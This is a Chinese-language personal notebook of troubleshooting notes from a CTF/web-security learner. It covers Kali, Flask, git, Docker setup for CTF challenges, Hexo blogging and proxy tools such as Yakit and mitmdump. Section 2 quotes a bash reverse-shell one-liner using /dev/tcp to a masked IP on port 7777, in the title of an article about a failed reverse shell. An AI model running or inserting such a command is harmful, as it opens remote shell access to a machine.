1
写一下遇到的问题:
kali中dirsearch无法使用python3版的可能是没更新(python开头的有的扫不到)
输入Y后显示install失败
在终端中输入 sudo apt -y update 和 sudo apt -y upgrade 来更新软件包列表并升级已安装的软件包。
用tplmap要用python2(用了pip2
然后版本太新可能用pip3安装依赖时会error提示
https://www.yaolong.net/article/pip-externally-managed-environment/喵的要死了
感觉还得再优化下弄两个虚拟坏境。。。
dirseach429请求过多无法正常运行
Skipped the target due to 429 status code
可加后缀 –max-rate=10之类的降低速率
kali无法ping github.com
https://www.cnblogs.com/byErichas/p/15765816.html
sudo vim /etc/hosts
140.82.113.4 github.com
199.232.69.194 github.global.ssl.fastly.net(以前好像在外面用过但还是watt toolkit好用
E直接编辑,i插入,ctrl+c退出,:wq!保存
kali仍无法git clone
可能是代理问题哈
https://blog.csdn.net/qq_31267769/article/details/107017322
请求查询参数(GET)请求主体参数(POST)
云服务器往近了选(是谁住在山西选的广州哈哈哈
ssh连linux是root为用户名!!!Administrator是windows的(哭
比起FinalShell什么的似乎mac终端/MobaXterm(Windows)更好?
远程用ToDesk
systemctl restart sshd
history|grep git(查找历史有git的命令)
flask:
https://tutorial.helloflask.com/hello/
安装flask的版本是最好按这个上面书上说的,安装2.1.3,而不是最新版本。因为他后面讲数据库的时候,他会要你安装,二点几的SQL alchemy,最新的已经到三点多了,会跟数据库那个出冲突。如果你已经安装了三点多,需要降级flask跟werkzeug,具体操作自己问ai。
. env/bin/activate (激活虚拟环境)deactivate(退)
./pycharm.sh(运行pycharm)
pycharm中flask(我的本机pycharm上有插件,但kali安装的没有(提一嘴我这种操作没必要,在windows上弄就行
https://www.cnblogs.com/pysele/p/12459134.html
注意app.py需在确保当前目录是项目的根目录下。(watchlist)
@app.route(‘/‘): / 对应的是主机名后面的路径部分
nano .gitignore(编辑) Control + O 和 Enter 键保存,然后按下 Control + X 键退出(我更用惯vim
当 python-dotenv 安装后,Flask 会从项目根目录的 .flaskenv 和 .env 文件读取环境变量并设置。
touch 命令创建touch .env .flaskenv。.flaskenv 用来存储 Flask 命令行系统相关的公开环境变量;而 .env 则用来存储敏感数据
上传图片需纯净url可访问(当然用静态文件的话就不用,用css调,换class),用width=”350” height=”200”之类的调大小
这个后续记得删除,不然会覆盖
还有就是模板中寻找链接的图片,好像会从头开始寻找。尽管我把一个名为donk.png图片放在static的下面,在实际中,它仍然显示的是我位于image文件夹(在static文件夹下)下的donk1.png(因为我image文件夹在图片donk.png前面)
而当我把donk.png改为dooonk.png就可以正确显示了
因此我认为最好不要往文件名加入数字(似乎会混淆)
用ctrl+D退出flask shell
在创建里向数据库中添加记录中加from app import db(出现
db.session.add(user)
Traceback (most recent call last):
File “
NameError: name ‘db’ is not defined报错的话),导入db对象,不知道为啥文里没写。
<模型类>.query.<过滤方法(可选)>.<查询方法>
用 @app.cli.command() 装饰器来注册。。 函数。flask xxx终于体验到程序员改bug的崩溃了,修了好多次(
用PythonAnywhere注册时需要挂个梯子
我第一次显示dotenv 模块没有被找到,重装了一遍虚拟环境后可了
还有就是它可能版本比较低,安requirement.txt时有的版本没有(我的都是最新版本的),得自己改一下再下
https://qing777.pythonanywhere.com/
git add .不了可能是多创了一个/watchlist文件夹
git push失败:致命错误:无法读取远程仓库。请确认您有正确的访问权限并且仓库存在。
可能是url后没加.git
或者将远程仓库删除后重新remote一遍
git branch -M main ,git remote add origin git@github.com:lingqing777/watchlist.git,git push -u origin main
picgo下载后打不开,发现在右下角托盘里点可
(这测试链接的图片也太抽象了吧
有的人github图床不稳定猜想是steam++(改hosts)的问题,我的暂时观察还行,建议用vpn稳定些
phpstudy的话var_dump(scandir(chr(47)));读取根目录竟然是 D盘(
将VMware Network Adapter VMnet8的IP改为与虚拟机IP同一网段
kali 使用命令ifconfig查询ip地址一直为127.0.0.1的解决办法_kali的ip地址是127.0.0.1-CSDN博客
VMware 主机(宿主)电脑访问虚拟机的服务—配置网络连接方式 - dong瓜(TreeSky) - 博客园且app.run(host = '0.0.0.0')
Kali Linux 不能联网上网 解决方法汇总(搬运) - z9m8r8 - 博客园
【Linux】NAT模式下关于主机ping不通虚拟机的问题_nat模式主机ping虚拟机超时-CSDN博客
我的是本机pingkali超时,然后重启解决(
我说实话%90的问题重新启动可解决(
Typora打开md文档出现乱码?一步搞定!_为什么以md结尾的文件修复后内容乱码-CSDN博客
图床上传typora无法显示,重新截图再上传,也可能是网管代理上传失败了(
burpsuit是啥,不认识,我只对yakit一心一意(渣渣灰
ctrl+A全选
这么看来遇到这么多问题真是太惨了(哭
有生之年一定要搞个歌单狠狠宣传一下我宣的宝藏歌手^_^
其他的一些再说吧,先放到这,又要消失了(
2
用联想浏览器打开CyberChef会出些意外,换个浏览器就好了
初次使用劫持工具无法达到想要的响应是认证问题
当前无法使用此页面
cn.bing.com 重定向你太多次。CSDN编程社区
Edge 修改字符编码(详细图文)_edge浏览器编码设置-CSDN博客
win10更新后edge找不到服务器,Microsoft Edge 使用你当前的服务提供商,改成使用当前的服务提供商。好多次拒绝我就换个(渣
Requestbin介绍两个调试http/https交互的模拟工具之一:使用requestbin的HTTPBin检查你发送的数据 - li9club - 博客园
1.我之前用过的云服务器都是linux跟windows一体的,可以直接ssh连上;并且我其实不太清楚ssh的原理,还以为只要B机单向安装ssh即可(。此次使用了win的实例,便由此造成了困扰。
2.开启ssh服务用这个也许会更方便https://zhuanlan.zhihu.com/p/2882095347
3.关于用户名Administrator试了一下,首字母小a与大A都可以。
4.我有win实例,还要ssh确实是自找烦恼,我连上后,想再试一遍,显示Permission denied,还得去改,有一种在powershell上用linux的美(
但没事可以改(
bash -c "bash -i >& /dev/tcp/x.xxx.xxx.xxx/7777 0>&1"反弹shell失败 原来是这个原因_反弹shell时kali监听不到端口数据怎么办-CSDN博客
pycharm下不了库可以把代理关了再下试试。
3
wsl.exe -d Ubuntuhttps://learn.microsoft.com/zh-cn/windows/wsl/tutorials/wsl-containers
1、docker pull openresty/openresty:alpine
2、docker build -t magic-mirror .
3、 docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
<none> <none> 0beeea22be24 10 minutes ago 319MB
4、 docker run -d --name ctfprofile -p 8080:80 0beeea22be24
docker run -d --name mirror -p 8081:8080 0beeea22be24
docker run -d --name mirror -p 8081:8888 38f387eaaac1
d251dd8e43c3e2e1fa24f668979a75b8fdc9723e25c3b6fc6370692e133c6c0b(容器 ID )
或
docker run --rm -p 8081:8080 -e GZCTF_FLAG='flag{YOUR_REAL_FLA
G}' magic-mirror
*docker ps(检测是否成功)
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
d251dd8e43c3 0beeea22be24 "/docker-entrypoint.…" 18 seconds ago Up 17 seconds 0.0.0.0:8080->80/tcp, [::]:8080->80/tcp ctfprofile
5、Start-Process "http://localhost:8080"(powershell)
start http://localhost:8081(cmd)
6、docker logs -f ctfprofile
# 创建临时容器检查
//docker run --rm -it mirror sh
//~ $ ls
//ctf-app robots.txt
//~ $ exit
docker tag mirror q1n9g/hashctf-mirror:latest(改标签)
D:\Desktop\ctf\出题\1>docker-compose up -d --build
[+] Running 2/2
✔ Network 1_mikus-network Created 0.1s
✔ Container mikus-blog Started 0.5s
D:\Desktop\ctf\出题\1>docker logs -f mikus-blog
docker exec -it mikus-blog bash
docker compose down
docker compose build --no-cache
docker compose up4
映射到8081即可,用内置浏览器
Burp插件之Param-Miner | Lamber’s Blog
127.0.0.1
::1
localhost5
http://blinkfox.com/2018/09/28/qian-duan/hexo-bo-ke-zhu-ti-zhi-hexo-theme-matery-de-jie-shao/
https://github.com/blinkfox/hexo-theme-matery/blob/develop/README_CN.md
使用 Hexo + GitHub 搭建个人博客 - Sulawesi02’s Blog
(1 封私信 / 34 条消息) 使用 Hexo+GitHub 搭建个人免费博客教程(小白向) - 知乎
公钥:
C:\Users\16256\.ssh、id_rsa.pub
hexo g
hexo s
hexo dhttps://github.com/blinkfox/hexo-theme-matery/issues/919
6
go env -w GOPROXY=https://goproxy.cn,direct
go env GOPROXY
# 输出应为:https://goproxy.cn,direct
go get -u github.com/gin-gonic/gin
go run .
php -S localhost:80007
pip因 SSL 协议错误无法下载
如果你正在使用代理(如系统代理、VPN、Clash 等),尝试临时关闭所有代理工具,然后重新安装:
原因:部分代理会修改 HTTPS 流量,导致 SSL 握手时协议不匹配(如强制使用低版本 TLS 或拦截证书)。8
使用 GZCTF 结合 GitHub 仓库搭建独立容器与动态 Flag 的 CTF 靶场+基于 Docker 的 Web 出题与部署+容器权限控制_gzctf动态flag-CSDN博客
Personal Access Tokens (Classic)
docker tag q1n9g/mikus-blog:latest ghcr.io/lingqing777/mikus-blog:latest
docker tag magic-mirror:latest ghcr.io/lingqing777/magic-mirror:latest
echo [GitHub Personal Access Token (ghp)] | docker login ghcr.io -u lingqing777 --password-stdin
Login Succeeded
docker push ghcr.io/lingqing777/mikus-blog:latest
docker push ghcr.io/lingqing777/magic-mirror:latest9
localhost和127.0.0.1不互通的看C:\Windows\System32\drivers\etc\hosts。检查文件中是否有一行 127.0.0.1 localhost,且未被 # 注释(# 开头的行为注释,无效)。
yakit不代理127.0.0.1的
解决方法:强制让 127.0.0.1 走 Yakit 代理
1. 针对 Firefox 浏览器的配置(关键步骤)
Firefox 有专门的配置项控制本地地址是否走代理,需要手动修改:
打开 Firefox,访问 about:config(点击 “接受风险并继续”)。
搜索并修改以下配置:
network.proxy.allow_hijacking_localhost
双击该选项,将值从 false 改为 true(允许代理劫持本地地址,即让 127.0.0.1 走代理)。
network.proxy.no_proxies_on
确保该选项的值为空(默认可能包含 localhost,127.0.0.1,需要删除这些内容,避免排除本地地址)。
重新进入 Firefox 代理设置(about:preferences#general → 网络设置 → 设置),确认:
手动配置代理为 127.0.0.1 和 Yakit 的监听端口(如 8080)。
“不使用代理的地址” 输入框为空(无任何内容)。10
如何在Windows子系统中重置Kali Linux密码 kali-linux windows-subsystem-for-linux password-recovery - Dev59
尽管蚁剑配置代理
测试公网不成功,但连码还是可以,这是因为咱们一般靶场都是http,公网是https,测试链接靶场是可以成功的。
蚁剑连不上本地可能是防火墙没关
mitmdump -p 8089本地起个代理服务器后
用mitmdump确实需要配置代理,因为他就像bp一样会劫持/解密 https 流量,所以你浏览器要配置证书。我来讲一下为啥渗透中不用配置证书:因为我们stowaway用http代理、socks代理的话。stowaway 的 HTTP 代理只做流量转发,不做中间人解密。SOCKS 代理本身就是纯转发协议,也不用配置证书。所以实际上浏览器会直接和目标网站建立 TLS 加密连接,不会有中间人解析这个包看看,再自己加密
[Git] 一次搞定:Github 2FA(Two-Factor Authentication/两因素认证) - 千千寰宇 - 博客园d
报错:找不到或无法加载主类 com.summersec.attack.UI.Main · Issue #41 · SummerSec/ShiroAttack2d
听说这个pwn工具挺好用的
